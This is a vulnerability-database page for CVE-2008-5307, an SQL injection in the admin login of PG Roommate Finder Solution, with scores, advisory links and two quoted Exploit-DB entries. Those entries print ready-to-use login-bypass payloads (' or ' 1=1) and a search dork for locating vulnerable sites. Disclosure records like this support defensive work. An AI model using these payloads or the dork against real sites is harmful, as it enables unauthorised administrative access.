CVE-2008-5307
published 2008-12-02CVE-2008-5307: SQL injection vulnerability in admin/index.php in PG Roommate Finder Solution allows remote attackers to execute arbitrary SQL commands via the login_lg…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.16%
63.2th percentile
SQL injection vulnerability in admin/index.php in PG Roommate Finder Solution allows remote attackers to execute arbitrary SQL commands via the login_lg parameter. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pilot_group | pg_real_roommate_finder_solution | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Pilot Group PG Roommate Finder Solution - Authentication Bypass
exploitdb·2008-11-23
CVE-2008-5307 Pilot Group PG Roommate Finder Solution - Authentication Bypass
Pilot Group PG Roommate Finder Solution - Authentication Bypass
---
[~] PG Roomate Finder Solution Auth Bypass
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Date: 23.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz ( bIktIm )
[~]
[~] dork: "Powered by PG Roomate Finder Solution - roommate estate web site design" ( aha size dork :( ( )
[~] -----------------------------------------------------------
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
exploit
Exploit-DB
Pilot Group PG Roommate Finder Solution - SQL Injection
exploitdb·2008-11-23
CVE-2008-5307 Pilot Group PG Roommate Finder Solution - SQL Injection
Pilot Group PG Roommate Finder Solution - SQL Injection
---
source: https://www.securityfocus.com/bid/32430/info
Pilot Group PG Roommate is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following proof of concept is available:
username: admin ' or ' 1=1--
password: anything
No writeups or analysis indexed.
http://secunia.com/advisories/32841http://securityreason.com/securityalert/4678http://www.securityfocus.com/bid/32430http://www.vupen.com/english/advisories/2008/3238https://exchange.xforce.ibmcloud.com/vulnerabilities/46794https://www.exploit-db.com/exploits/7201http://secunia.com/advisories/32841http://securityreason.com/securityalert/4678http://www.securityfocus.com/bid/32430http://www.vupen.com/english/advisories/2008/3238https://exchange.xforce.ibmcloud.com/vulnerabilities/46794https://www.exploit-db.com/exploits/7201
2008-12-02
Published